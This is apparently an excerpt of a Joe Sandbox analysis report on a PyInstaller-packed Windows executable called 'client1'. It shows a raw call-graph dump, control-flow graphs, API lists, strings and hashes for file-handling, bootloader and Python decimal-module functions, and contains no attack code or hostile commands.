7ff79f622e00 75 API calls 97121->97124 97122 7ff79f622a91 97179 7ff79f626720 98 API calls 97122->97179 97126 7ff79f622b1c 97124->97126 97125 7ff79f622a99 97127 7ff79f622aba 97125->97127 97180 7ff79f626600 138 API calls 2 library calls 97125->97180 97128 7ff79f622b20 97126->97128 97129 7ff79f622b86 97126->97129 97135 7ff79f622ac3 97127->97135 97183 7ff79f622770 59 API calls 2 library calls 97127->97183 97181 7ff79f626720 98 API calls 97128->97181 97132 7ff79f622e00 75 API calls 97129->97132 97136 7ff79f622bb2 97132->97136 97134 7ff79f622b28 97134->97127 97182 7ff79f626600 138 API calls 2 library calls 97134->97182 97139 7ff79f62ad80 _wfindfirst32i64 8 API calls 97135->97139 97140 7ff79f622e00 75 API calls 97136->97140 97147 7ff79f622c12 97136->97147 97142 7ff79f622b7b 97139->97142 97143 7ff79f622be2 97140->97143 97141 7ff79f622b45 97141->97127 97144 7ff79f622dc6 97141->97144 97142->96739 97146 7ff79f622e00 75 API calls 97143->97146 97143->97147 97188 7ff79f622770 59 API calls 2 library calls 97144->97188 97146->97147 97147->97145 97184 7ff79f626720 98 API calls 97147->97184 97148 7ff79f621af0 59 API calls 97151 7ff79f622c7f 97148->97151 97150 7ff79f622c22 97150->97145 97150->97148 97159 7ff79f622d3f 97150->97159 97151->97145 97153 7ff79f621b30 49 API calls 97151->97153 97152 7ff79f622d3a 97189 7ff79f621ab0 74 API calls __std_exception_copy 97152->97189 97155 7ff79f622ca7 97153->97155 97155->97144 97157 7ff79f621b30 49 API calls 97155->97157 97156 7ff79f622dab 97156->97144 97187 7ff79f621440 161 API calls 2 library calls 97156->97187 97158 7ff79f622cd4 97157->97158 97158->97144 97161 7ff79f621b30 49 API calls 97158->97161 97159->97156 97186 7ff79f621780 59 API calls 97159->97186 97162 7ff79f622d01 97161->97162 97162->97144 97164 7ff79f6217b0 121 API calls 97162->97164 97165 7ff79f622d23 97164->97165 97165->97159 97166 7ff79f622d27 97165->97166 97185 7ff79f622770 59 API calls 2 library calls 97166->97185 97168->96739 97169->96733 97170->96739 97172 7ff79f622e34 97171->97172 97190 7ff79f633be4 97172->97190 97176 7ff79f622e6b 97177 7ff79f62ad80 _wfindfirst32i64 8 API calls 97176->97177 97178 7ff79f622a8d 97177->97178 97178->97121 97178->97122 97179->97125 97180->97127 97181->97134 97182->97141 97183->97135 97184->97150 97185->97152 97186->97159 97187->97156 97188->97152 97189->97145 97191 7ff79f633c3e 97190->97191 97192 7ff79f633c63 97191->97192 97194 7ff79f633c9f 97191->97194 97225 7ff79f639ce4 37 API calls 2 library calls 97192->97225 97226 7ff79f631e70 49 API calls _invalid_parameter_noinfo 97194->97226 97196 7ff79f633c8d 97199 7ff79f62ad80 _wfindfirst32i64 8 API calls 97196->97199 97198 7ff79f633d36 97200 7ff79f633d7c 97198->97200 97202 7ff79f633d51 97198->97202 97203 7ff79f633da0 97198->97203 97204 7ff79f633d48 97198->97204 97201 7ff79f622e5a 97199->97201 97229 7ff79f639e18 11 API calls 2 library calls 97200->97229 97201->97176 97208 7ff79f634e08 97201->97208 97227 7ff79f639e18 11 API calls 2 library calls 97202->97227 97203->97200 97205 7ff79f633daa 97203->97205 97204->97200 97204->97202 97228 7ff79f639e18 11 API calls 2 library calls 97205->97228 97209 7ff79f634e31 97208->97209 97210 7ff79f634e25 97208->97210 97255 7ff79f634a1c 45 API calls __GetCurrentState 97209->97255 97230 7ff79f634680 97210->97230 97213 7ff79f634e59 97217 7ff79f634e69 97213->97217 97256 7ff79f63dfcc 5 API calls __crtLCMapStringW 97213->97256 97216 7ff79f634ec1 97218 7ff79f634ed9 97216->97218 97219 7ff79f634ec5 97216->97219 97257 7ff79f634504 14 API calls 3 library calls 97217->97257 97221 7ff79f634680 69 API calls 97218->97221 97220 7ff79f634e2a 97219->97220 97258 7ff79f639e18 11 API calls 2 library calls 97219->97258 97220->97176 97223 7ff79f634ee5 97221->97223 97223->97220 97259 7ff79f639e18 11 API calls 2 library calls 97223->97259 97225->97196 97226->97198 97227->97196 97228->97196 97229->97196 97231 7ff79f63469a 97230->97231 97232 7ff79f6346b7 97230->97232 97260 7ff79f634424 11 API calls _set_fmode 97231->97260 97232->97231 97234 7ff79f6346ca CreateFileW 97232->97234 97236 7ff79f6346fe 97234->97236 97237 7ff79f634734 97234->97237 97235 7ff79f63469f 97261 7ff79f634444 11 API calls _set_fmode 97235->97261 97263 7ff79f6347d4 59 API calls 3 library calls 97236->97263 97264 7ff79f634cf8 46 API calls 3 library calls 97237->97264 97241 7ff79f63470c 97244 7ff79f634729 CloseHandle 97241->97244 97245 7ff79f634713 CloseHandle 97241->97245 97242 7ff79f634739 97246 7ff79f634768 97242->97246 97247 7ff79f63473d 97242->97247 97243 7ff79f6346a7 97262 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97243->97262 97249 7ff79f6346b2 97244->97249 97245->97249 97266 7ff79f634ab8 51 API calls 97246->97266 97265 7ff79f6343b8 11 API calls 2 library calls 97247->97265 97249->97220 97252 7ff79f634775 97267 7ff79f634bf4 21 API calls _fread_nolock 97252->97267 97254 7ff79f634747 97254->97249 97255->97213 97256->97217 97257->97216 97258->97220 97259->97220 97260->97235 97261->97243 97263->97241 97264->97242 97265->97254 97266->97252 97267->97254 97268->96749 97271 7ff79f6353fc 97270->97271 97272 7ff79f635422 97271->97272 97275 7ff79f635455 97271->97275 97301 7ff79f634444 11 API calls _set_fmode 97272->97301 97274 7ff79f635427 97302 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97274->97302 97277 7ff79f635468 97275->97277 97278 7ff79f63545b 97275->97278 97289 7ff79f63a0f8 97277->97289 97303 7ff79f634444 11 API calls _set_fmode 97278->97303 97282 7ff79f635489 97296 7ff79f63f49c 97282->97296 97283 7ff79f63547c 97304 7ff79f634444 11 API calls _set_fmode 97283->97304 97286 7ff79f63549c 97305 7ff79f6342f8 LeaveCriticalSection 97286->97305 97288 7ff79f623d09 97288->96760 97306 7ff79f63f788 EnterCriticalSection 97289->97306 97291 7ff79f63a10f 97292 7ff79f63a16c 19 API calls 97291->97292 97293 7ff79f63a11a 97292->97293 97294 7ff79f63f7e8 _isindst LeaveCriticalSection 97293->97294 97295 7ff79f635472 97294->97295 97295->97282 97295->97283 97307 7ff79f63f198 97296->97307 97299 7ff79f63f4f6 97299->97286 97301->97274 97303->97288 97304->97288 97308 7ff79f63f1d3 __vcrt_FlsAlloc 97307->97308 97317 7ff79f63f39a 97308->97317 97322 7ff79f645474 51 API calls 3 library calls 97308->97322 97310 7ff79f63f471 97326 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97310->97326 97312 7ff79f63f3a3 97312->97299 97319 7ff79f64615c 97312->97319 97314 7ff79f63f405 97314->97317 97323 7ff79f645474 51 API calls 3 library calls 97314->97323 97316 7ff79f63f424 97316->97317 97324 7ff79f645474 51 API calls 3 library calls 97316->97324 97317->97312 97325 7ff79f634444 11 API calls _set_fmode 97317->97325 97327 7ff79f64575c 97319->97327 97322->97314 97323->97316 97324->97317 97325->97310 97328 7ff79f645791 97327->97328 97329 7ff79f645773 97327->97329 97328->97329 97332 7ff79f6457ad 97328->97332 97381 7ff79f634444 11 API calls _set_fmode 97329->97381 97331 7ff79f645778 97382 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97331->97382 97338 7ff79f645d6c 97332->97338 97335 7ff79f645784 97335->97299 97384 7ff79f645aa0 97338->97384 97341 7ff79f645df9 97404 7ff79f636cfc 97341->97404 97342 7ff79f645de1 97416 7ff79f634424 11 API calls _set_fmode 97342->97416 97346 7ff79f645de6 97417 7ff79f634444 11 API calls _set_fmode 97346->97417 97374 7ff79f6457d8 97374->97335 97383 7ff79f636cd4 LeaveCriticalSection 97374->97383 97381->97331 97385 7ff79f645acc 97384->97385 97392 7ff79f645ae6 97384->97392 97385->97392 97429 7ff79f634444 11 API calls _set_fmode 97385->97429 97387 7ff79f645adb 97430 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97387->97430 97389 7ff79f645bb5 97402 7ff79f645c12 97389->97402 97435 7ff79f63576c 37 API calls 2 library calls 97389->97435 97390 7ff79f645b64 97390->97389 97433 7ff79f634444 11 API calls _set_fmode 97390->97433 97392->97390 97431 7ff79f634444 11 API calls _set_fmode 97392->97431 97394 7ff79f645c0e 97397 7ff79f645c90 97394->97397 97394->97402 97396 7ff79f645baa 97434 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97396->97434 97436 7ff79f639dd0 17 API calls _wfindfirst32i64 97397->97436 97398 7ff79f645b59 97432 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97398->97432 97402->97341 97402->97342 97437 7ff79f63f788 EnterCriticalSection 97404->97437 97416->97346 97417->97374 97429->97387 97431->97398 97433->97396 97435->97394 97439 7ff79f637968 97438->97439 97442 7ff79f637444 97439->97442 97441 7ff79f637981 97441->96770 97443 7ff79f63748e 97442->97443 97444 7ff79f63745f 97442->97444 97452 7ff79f6342ec EnterCriticalSection 97443->97452 97453 7ff79f639ce4 37 API calls 2 library calls 97444->97453 97447 7ff79f637493 97449 7ff79f6374b0 38 API calls 97447->97449 97448 7ff79f63747f 97448->97441 97450 7ff79f63749f 97449->97450 97451 7ff79f6342f8 _fread_nolock LeaveCriticalSection 97450->97451 97451->97448 97453->97448 97455 7ff79f62f0d1 97454->97455 97456 7ff79f62f0a3 97454->97456 97463 7ff79f62f0c3 97455->97463 97464 7ff79f6342ec EnterCriticalSection 97455->97464 97465 7ff79f639ce4 37 API calls 2 library calls 97456->97465 97459 7ff79f62f0e8 97460 7ff79f62f104 72 API calls 97459->97460 97461 7ff79f62f0f4 97460->97461 97462 7ff79f6342f8 _fread_nolock LeaveCriticalSection 97461->97462 97462->97463 97463->96774 97465->97463 97466 7ffbaa70de38 97467 7ffbaa7166fc __acrt_iob_func 97466->97467 97468 7ffbaa70deae 97466->97468 97582 7ffbaa717218 __stdio_common_vfprintf 97467->97582 97578 7ffbaa70e7b8 97468->97578 97471 7ffbaa716723 __acrt_iob_func 97583 7ffbaa717218 __stdio_common_vfprintf 97471->97583 97472 7ffbaa70df14 97475 7ffbaa716803 97472->97475 97477 7ffbaa70e7b8 PyErr_Format 97472->97477 97474 7ffbaa71673d __acrt_iob_func fputc 97484 7ffbaa71675c _Py_Dealloc 97474->97484 97476 7ffbaa716873 97475->97476 97478 7ffbaa71686d _Py_Dealloc 97475->97478 97480 7ffbaa716888 97476->97480 97482 7ffbaa71687f _Py_Dealloc 97476->97482 97479 7ffbaa70df37 97477->97479 97478->97476 97479->97475 97481 7ffbaa70df47 PyType_Ready 97479->97481 97483 7ffbaa71689d 97480->97483 97486 7ffbaa716894 _Py_Dealloc 97480->97486 97481->97475 97485 7ffbaa70df7f PyType_Ready 97481->97485 97482->97480 97487 7ffbaa7168b1 97483->97487 97489 7ffbaa7168a8 _Py_Dealloc 97483->97489 97491 7ffbaa71676b _Py_Dealloc 97484->97491 97485->97475 97488 7ffbaa70df94 PyType_Ready 97485->97488 97486->97483 97490 7ffbaa7168d0 97487->97490 97493 7ffbaa7168ca _Py_Dealloc 97487->97493 97488->97475 97492 7ffbaa70dfa9 PyType_Ready 97488->97492 97489->97487 97494 7ffbaa7168ef 97490->97494 97497 7ffbaa7168e9 _Py_Dealloc 97490->97497 97498 7ffbaa71677a _Py_Dealloc 97491->97498 97492->97475 97496 7ffbaa70dfbe PyUnicode_FromString 97492->97496 97493->97490 97495 7ffbaa71690e 97494->97495 97499 7ffbaa716908 _Py_Dealloc 97494->97499 97500 7ffbaa71692d 97495->97500 97504 7ffbaa716927 _Py_Dealloc 97495->97504 97501 7ffbaa716810 97496->97501 97502 7ffbaa70dfd7 PyDict_SetItemString 97496->97502 97497->97494 97503 7ffbaa716786 _Py_Dealloc 97498->97503 97499->97495 97506 7ffbaa71694c 97500->97506 97510 7ffbaa716946 _Py_Dealloc 97500->97510 97505 7ffbaa716824 97501->97505 97508 7ffbaa71681b _Py_Dealloc 97501->97508 97502->97501 97507 7ffbaa70dff6 PyDict_SetItemString 97502->97507 97513 7ffbaa716792 _Py_Dealloc 97503->97513 97504->97500 97509 7ffbaa716838 97505->97509 97514 7ffbaa71682f _Py_Dealloc 97505->97514 97512 7ffbaa71696b 97506->97512 97516 7ffbaa716965 _Py_Dealloc 97506->97516 97507->97501 97511 7ffbaa70e015 97507->97511 97508->97505 97509->97475 97519 7ffbaa716847 _Py_Dealloc 97509->97519 97510->97506 97511->97484 97515 7ffbaa70e01f PyImport_ImportModule 97511->97515 97517 7ffbaa71697f 97512->97517 97520 7ffbaa716976 _Py_Dealloc 97512->97520 97521 7ffbaa7167a1 _Py_Dealloc 97513->97521 97514->97509 97515->97505 97518 7ffbaa70e038 PyObject_GetAttrString 97515->97518 97516->97512 97518->97505 97522 7ffbaa70e058 PyObject_CallMethod 97518->97522 97519->97475 97520->97517 97524 7ffbaa7167ad _Py_Dealloc 97521->97524 97522->97501 97523 7ffbaa70e082 97522->97523 97523->97491 97525 7ffbaa70e08c PyObject_GetAttrString 97523->97525 97527 7ffbaa7167b9 _Py_Dealloc 97524->97527 97525->97505 97526 7ffbaa70e0ac 97525->97526 97526->97498 97526->97503 97528 7ffbaa70e0cd PyImport_ImportModule 97526->97528 97530 7ffbaa7167c5 _Py_Dealloc 97527->97530 97528->97475 97529 7ffbaa70e0e6 PyObject_CallMethod 97528->97529 97529->97475 97531 7ffbaa70e120 PyUnicode_FromString 97529->97531 97533 7ffbaa7167d4 _Py_Dealloc 97530->97533 97531->97501 97532 7ffbaa70e139 PyDict_SetItemString 97531->97532 97532->97501 97534 7ffbaa70e15f 97532->97534 97536 7ffbaa7167e3 PyModule_AddIntConstant 97533->97536 97534->97513 97535 7ffbaa70e169 PyImport_ImportModule 97534->97535 97535->97475 97537 7ffbaa70e182 PyObject_GetAttrString 97535->97537 97536->97475 97576 7ffbaa70e667 97536->97576 97537->97475 97538 7ffbaa70e19e PyObject_CallFunction 97537->97538 97538->97475 97540 7ffbaa70e1d5 97538->97540 97539 7ffbaa70e67e 97541 7ffbaa70e68b PyUnicode_InternFromString 97539->97541 97544 7ffbaa70e6e2 PyModule_AddStringConstant 97539->97544 97540->97521 97540->97524 97540->97527 97543 7ffbaa70e209 PyModule_Create2 97540->97543 97541->97475 97542 7ffbaa70e6b1 PyModule_AddObject 97541->97542 97542->97475 97542->97539 97543->97475 97545 7ffbaa70e227 PyModule_AddObject 97543->97545 97544->97475 97546 7ffbaa70e701 PyModule_AddStringConstant 97544->97546 97545->97475 97547 7ffbaa70e24d PyModule_AddObject 97545->97547 97546->97501 97548 7ffbaa70e723 97546->97548 97547->97475 97549 7ffbaa70e273 PyModule_AddObject 97547->97549 97549->97475 97550 7ffbaa70e295 PyErr_NewException 97549->97550 97550->97475 97551 7ffbaa70e2bf PyModule_AddObject 97550->97551 97551->97475 97552 7ffbaa70e2dd PyTuple_New 97551->97552 97552->97475 97553 7ffbaa70e2f8 97552->97553 97553->97530 97554 7ffbaa70e73e PyTuple_Pack 97553->97554 97556 7ffbaa70e75f PyTuple_Pack 97553->97556 97557 7ffbaa70e332 PyTuple_Pack 97553->97557 97559 7ffbaa70e376 PyModule_AddObject 97553->97559 97571 7ffbaa70e3c0 97553->97571 97554->97556 97556->97554 97557->97475 97558 7ffbaa70e350 PyErr_NewException 97557->97558 97558->97475 97558->97553 97559->97475 97559->97553 97560 7ffbaa70e459 PyObject_CallObject 97560->97475 97561 7ffbaa70e47b PyModule_AddObject 97560->97561 97561->97475 97562 7ffbaa70e499 PyContextVar_New 97561->97562 97562->97475 97566 7ffbaa70e4b8 PyModule_AddObject 97562->97566 97563 7ffbaa70e3eb PyTuple_Pack 97563->97475 97565 7ffbaa70e402 PyErr_NewException 97563->97565 97564 7ffbaa70e79d PyTuple_Pack 97564->97467 97565->97475 97565->97571 97566->97475 97567 7ffbaa70e4e1 PyModule_AddObject 97566->97567 97567->97475 97569 7ffbaa70e50a PyObject_CallObject 97567->97569 97568 7ffbaa70e428 PyModule_AddObject 97568->97475 97568->97571 97569->97475 97570 7ffbaa70e528 PyModule_AddObject 97569->97570 97570->97475 97572 7ffbaa70e5a8 PyObject_CallObject 97570->97572 97571->97533 97571->97560 97571->97563 97571->97564 97571->97568 97572->97475 97573 7ffbaa70e5c3 PyModule_AddObject 97572->97573 97573->97475 97574 7ffbaa70e621 97573->97574 97575 7ffbaa70e631 PyLong_FromSsize_t 97574->97575 97574->97576 97575->97475 97577 7ffbaa70e647 PyModule_AddObject 97575->97577 97576->97536 97576->97539 97577->97501 97577->97574 97579 7ffbaa716986 PyErr_Format 97578->97579 97580 7ffbaa70e7cf 97578->97580 97579->97472 97580->97579 97581 7ffbaa70e80d 97580->97581 97581->97472 97582->97471 97583->97474 97584 7ffbab498382 97586 7ffbab4983c6 97584->97586 97585 7ffbab4983fe 97587 7ffbab498420 97585->97587 97588 7ffbab498417 _Py_Dealloc 97585->97588 97586->97585 97591 7ffbab4983dd 97586->97591 97589 7ffbab49842b _Py_Dealloc 97587->97589 97590 7ffbab498434 97587->97590 97588->97587 97589->97590 97592 7ffbab49844d _Py_Dealloc 97590->97592 97593 7ffbab498453 97590->97593 97595 7ffbab4983e3 _Py_Dealloc 97591->97595 97596 7ffbab4983ec 97591->97596 97592->97593 97594 7ffbab498472 97593->97594 97597 7ffbab49846c _Py_Dealloc 97593->97597 97598 7ffbab498491 97594->97598 97599 7ffbab49848b _Py_Dealloc 97594->97599 97595->97596 97597->97594 97600 7ffbab4984b0 97598->97600 97601 7ffbab4984aa _Py_Dealloc 97598->97601 97599->97598 97602 7ffbab4984cf 97600->97602 97604 7ffbab4984c9 _Py_Dealloc 97600->97604 97601->97600 97603 7ffbab4984ee 97602->97603 97605 7ffbab4984e8 _Py_Dealloc 97602->97605 97606 7ffbab49850d 97603->97606 97607 7ffbab498507 _Py_Dealloc 97603->97607 97604->97602 97605->97603 97608 7ffbab49852c 97606->97608 97609 7ffbab498526 _Py_Dealloc 97606->97609 97607->97606 97610 7ffbab49854b 97608->97610 97611 7ffbab498545 _Py_Dealloc 97608->97611 97609->97608 97611->97610

                                                    Executed Functions

                                                    Function 00007FF79F645D6C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 432 7ff79f645d6c-7ff79f645ddf call 7ff79f645aa0 435 7ff79f645df9-7ff79f645e03 call 7ff79f636cfc 432->435 436 7ff79f645de1-7ff79f645dea call 7ff79f634424 432->436 441 7ff79f645e1e-7ff79f645e87 CreateFileW 435->441 442 7ff79f645e05-7ff79f645e1c call 7ff79f634424 call 7ff79f634444 435->442 443 7ff79f645ded-7ff79f645df4 call 7ff79f634444 436->443 445 7ff79f645e89-7ff79f645e8f 441->445 446 7ff79f645f04-7ff79f645f0f GetFileType 441->446 442->443 454 7ff79f64613a-7ff79f64615a 443->454 452 7ff79f645ed1-7ff79f645eff GetLastError call 7ff79f6343b8 445->452 453 7ff79f645e91-7ff79f645e95 445->453 449 7ff79f645f62-7ff79f645f69 446->449 450 7ff79f645f11-7ff79f645f4c GetLastError call 7ff79f6343b8 CloseHandle 446->450 457 7ff79f645f6b-7ff79f645f6f 449->457 458 7ff79f645f71-7ff79f645f74 449->458 450->443 466 7ff79f645f52-7ff79f645f5d call 7ff79f634444 450->466 452->443 453->452 459 7ff79f645e97-7ff79f645ecf CreateFileW 453->459 463 7ff79f645f7a-7ff79f645fcf call 7ff79f636c14 457->463 458->463 464 7ff79f645f76 458->464 459->446 459->452 471 7ff79f645fee-7ff79f64601f call 7ff79f645820 463->471 472 7ff79f645fd1-7ff79f645fdd call 7ff79f645ca8 463->472 464->463 466->443 478 7ff79f646021-7ff79f646023 471->478 479 7ff79f646025-7ff79f646067 471->479 472->471 477 7ff79f645fdf 472->477 480 7ff79f645fe1-7ff79f645fe9 call 7ff79f639f90 477->480 478->480 481 7ff79f646089-7ff79f646094 479->481 482 7ff79f646069-7ff79f64606d 479->482 480->454 485 7ff79f64609a-7ff79f64609e 481->485 486 7ff79f646138 481->486 482->481 484 7ff79f64606f-7ff79f646084 482->484 484->481 485->486 488 7ff79f6460a4-7ff79f6460e9 CloseHandle CreateFileW 485->488 486->454 489 7ff79f64611e-7ff79f646133 488->489 490 7ff79f6460eb-7ff79f646119 GetLastError call 7ff79f6343b8 call 7ff79f636e3c 488->490 489->486 490->489
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                    • String ID:
                                                    • API String ID: 1617910340-0
                                                    • Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                    • Instruction ID: 0ea52da5d498d6fa947fcb687aec398ebf56143a13dc56fbb48df1efb45d6f64
                                                    • Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                    • Instruction Fuzzy Hash: B3C1A032B24B8286EB20FF75C4906ECB76AEB49B98B810235DA2E577D5CF39D451C710
                                                    Function 00007FFBAA70DE38 Relevance: 198.4, APIs: 78, Strings: 35, Instructions: 663COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Module_Object$String$Object_$CallTuple_$Pack$Err_FromReadyType_$AttrDict_ExceptionImportImport_ItemModuleUnicode___acrt_iob_func$ConstantMethod$ContextCreate2FormatFunctionInternLong_Ssize_tVar_fputc
                                                    • String ID: %s:%d: warning: $(O)$(ss)$1.70$2.5.1$BasicContext$Context$D:\a\1\s\Modules\_decimal\libmpdec\context.c$Decimal$DecimalException$DecimalTuple$DefaultContext$ExtendedContext$HAVE_CONTEXTVAR$HAVE_THREADS$MutableMapping$Number$Rational$SignalDict$__libmpdec_version__$__module__$__version__$as_integer_ratio$bit_length$collections$collections.abc$decimal$decimal.DecimalException$decimal_context$mpd_setminalloc: ignoring request to set MPD_MINALLOC a second time$namedtuple$numbers$register$s(OO){}$sign digits exponent
                                                    • API String ID: 2210023312-630389593
                                                    • Opcode ID: 82cadfb3d86e8010ec5de67c75d19b610295d7370cadf0ded26554864ad2c3d9
                                                    • Instruction ID: bf0de3b00c253d75e54a51d5f42226cce38df67bc0a0d214b04a4a9accd14fc6
                                                    • Opcode Fuzzy Hash: 82cadfb3d86e8010ec5de67c75d19b610295d7370cadf0ded26554864ad2c3d9
                                                    • Instruction Fuzzy Hash: 7B62E7A1A0BA42C1EB168F35E8541B66BECBF44B95F4451B6CE4D12374DF3DA54BC320
                                                    Function 00007FF79F6217B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                    • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                    • API String ID: 2153230061-4158440160
                                                    • Opcode ID: 9101801a2d3ac821dc45f3c210c6535dcaecc234eedfce769c1e2387d8d123d1
                                                    • Instruction ID: 9aac773805030bf4195233d69171114b75a8bd81207c8e60e0cba850760d5a67
                                                    • Opcode Fuzzy Hash: 9101801a2d3ac821dc45f3c210c6535dcaecc234eedfce769c1e2387d8d123d1
                                                    • Instruction Fuzzy Hash: DF516F72A1978286EF24EF38D8901F8A3AAEB48B58B914135D92CC7395DF3CE540C751
                                                    Function 00007FFBAB498382 Relevance: 18.1, APIs: 12, Instructions: 107COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 262 7ffbab498382-7ffbab4983c8 call 7ffbab494110 265 7ffbab4983ca-7ffbab4983d4 call 7ffbab4a0a30 262->265 266 7ffbab4983fe-7ffbab498408 262->266 270 7ffbab4983d9-7ffbab4983db 265->270 268 7ffbab49840a-7ffbab498415 266->268 269 7ffbab498420-7ffbab498423 266->269 268->269 271 7ffbab498417-7ffbab49841a _Py_Dealloc 268->271 272 7ffbab498434-7ffbab49843e 269->272 273 7ffbab498425-7ffbab498429 269->273 270->266 277 7ffbab4983dd-7ffbab4983e1 270->277 271->269 275 7ffbab498453-7ffbab49845d 272->275 276 7ffbab498440-7ffbab49844b 272->276 273->272 274 7ffbab49842b-7ffbab49842e _Py_Dealloc 273->274 274->272 279 7ffbab49845f-7ffbab49846a 275->279 280 7ffbab498472-7ffbab49847c 275->280 276->275 278 7ffbab49844d _Py_Dealloc 276->278 281 7ffbab4983e3-7ffbab4983e6 _Py_Dealloc 277->281 282 7ffbab4983ec-7ffbab4983fd 277->282 278->275 279->280 283 7ffbab49846c _Py_Dealloc 279->283 284 7ffbab49847e-7ffbab498489 280->284 285 7ffbab498491-7ffbab49849b 280->285 281->282 283->280 284->285 286 7ffbab49848b _Py_Dealloc 284->286 287 7ffbab49849d-7ffbab4984a8 285->287 288 7ffbab4984b0-7ffbab4984ba 285->288 286->285 287->288 289 7ffbab4984aa _Py_Dealloc 287->289 290 7ffbab4984bc-7ffbab4984c7 288->290 291 7ffbab4984cf-7ffbab4984d9 288->291 289->288 290->291 294 7ffbab4984c9 _Py_Dealloc 290->294 292 7ffbab4984db-7ffbab4984e6 291->292 293 7ffbab4984ee-7ffbab4984f8 291->293 292->293 295 7ffbab4984e8 _Py_Dealloc 292->295 296 7ffbab4984fa-7ffbab498505 293->296 297 7ffbab49850d-7ffbab498517 293->297 294->291 295->293 296->297 298 7ffbab498507 _Py_Dealloc 296->298 299 7ffbab498519-7ffbab498524 297->299 300 7ffbab49852c-7ffbab498536 297->300 298->297 299->300 301 7ffbab498526 _Py_Dealloc 299->301 302 7ffbab498538-7ffbab498543 300->302 303 7ffbab49854b-7ffbab498557 300->303 301->300 302->303 304 7ffbab498545 _Py_Dealloc 302->304 304->303
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
